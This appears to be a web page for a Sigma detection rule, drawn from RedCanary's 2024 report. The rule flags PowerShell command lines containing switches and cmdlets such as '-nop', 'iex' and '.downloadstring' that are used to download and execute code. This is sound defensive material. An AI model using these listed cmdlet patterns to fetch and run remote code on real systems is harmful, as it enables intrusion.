Suspicious PowerShell Cmdlets

calendar Mar 26, 2024 · attack.execution attack.t1059 attack.t1059.001  ·
Share on: linkedin copy

Many of our PowerShell detection analytics look for cmdlets, methods, and switches that may indicate malicious activity. The following analytic is by no means exhaustive but offers a few valuable examples of suspicious cmdlets and other oft-abused features to look out for. Part of the RedCanary 2024 Threat Detection Report.

Sigma rule (View on GitHub)

 1title: Suspicious PowerShell Cmdlets
 2id: 33a86fea-add2-42b3-bccb-96285c619933
 3status: experimental
 4description: |
 5    Many of our PowerShell detection analytics look for cmdlets, methods, and 
 6    switches that may indicate malicious activity. The following analytic is 
 7    by no means exhaustive but offers a few valuable examples of suspicious 
 8    cmdlets and other oft-abused features to look out for. Part of the 
 9    RedCanary 2024 Threat Detection Report.    
10references:
11    - https://redcanary.com/threat-detection-report/techniques/powershell/
12author: RedCanary, Sigma formatting by Micah Babinski
13date: 2024/03/21
14tags:
15    - attack.execution
16    - attack.t1059
17    - attack.t1059.001
18logsource:
19    category: process_creation
20    product: windows
21detection:
22    selection:
23        Image|endswith: '\powershell.exe'
24        CommandLine|contains:
25            - '-nop'
26            - '-noni'
27            - '-invoke-expression'
28            - 'iex'
29            - '.downloadstring'
30            - 'downloadfile'
31    condition: selection
32falsepositives:
33    - Unknown
34level: low```

References

Related rules

to-top